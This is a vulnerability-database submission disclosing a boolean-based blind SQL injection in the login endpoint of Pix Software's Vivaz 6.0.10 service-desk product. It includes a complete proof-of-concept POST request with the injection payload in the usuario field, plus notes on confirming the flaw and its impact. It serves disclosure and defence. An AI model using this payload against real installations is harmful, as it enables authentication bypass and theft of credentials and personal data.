| Title | Pix Software Vivaz 6.0.10 SQL Injection |
|---|
| Description | Product: Vivaz 6.0.10
Vendor: Pix Software https://www.pixsoft.com.br/vivaz-software-service-desk.htm
Vulnerability Type: SQL Injection (Boolean-Based Blind)
Affected Endpoint: /servlet?act=login (POST request)
Vulnerable Parameter: usuario
Severity: Critical
A critical SQL injection vulnerability was discovered in Pix Software's Vivaz 6.0.10 within the authentication endpoint. The vulnerability exists in the usuario parameter, which is improperly sanitized, allowing attackers to manipulate the SQL query logic. This issue can lead to unauthorized access, data exfiltration, or further exploitation of the application’s database.
PoC:
https://x.x.x.x/servlet?act=login&pixrnd=0125012212104825757927
POST /servlet?act=login&evento=0&pixrnd=0125012208313366528902&submit=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://x.x.x.x/
Cookie: cookie=TmpIsCookieEnabled; JSESSIONID=2667E48391FE746813F79A39B7B366E8
Content-Length: 155
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: x.x.x.x
Connection: Keep-alive
idIncPesqSatisfacao=1&item=1¶mUsuario=1&senha=u]H[ww6KrA9F.x-F&sistema=1&subItem=1&usuario=-1'%20OR%203*2*1=6%20AND%20000409=000409%20or%20'ZN790axZ'='
(Use nmap.)
Exploitation Details
- The payload injected in the usuario parameter uses a Boolean-Based Blind SQL Injection technique, verifying database responses by evaluating conditions like 3*2*1=6.
- The comparison 000409=000409 ensures that the query always returns true.
- If the application returns a different response when the payload is modified (e.g., replacing 3*2*1=6 with 3*2*1=7), it confirms the presence of an SQL injection vulnerability.
Impact
- An attacker can leverage this vulnerability to:
- Bypass authentication by injecting conditions that always evaluate as true.
- Enumerate database schema by crafting time-based payloads or exploiting error-based responses.
- Extract sensitive data such as user credentials, PII (Personally Identifiable Information), or application configurations.
- Compromise the entire database, leading to data loss or manipulation |
|---|
| Source | ⚠️ https://www.pixsoft.com.br/vivaz-software-service-desk.htm |
|---|
| User | Stux (UID 40142) |
|---|
| Submission | 02/01/2025 04:34 PM (1 Year ago) |
|---|
| Moderation | 02/10/2025 08:42 AM (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 295060 [Pix Software Vivaz 6.0.10 /servlet?act=login usuario sql injection] |
|---|
| Points | 17 |
|---|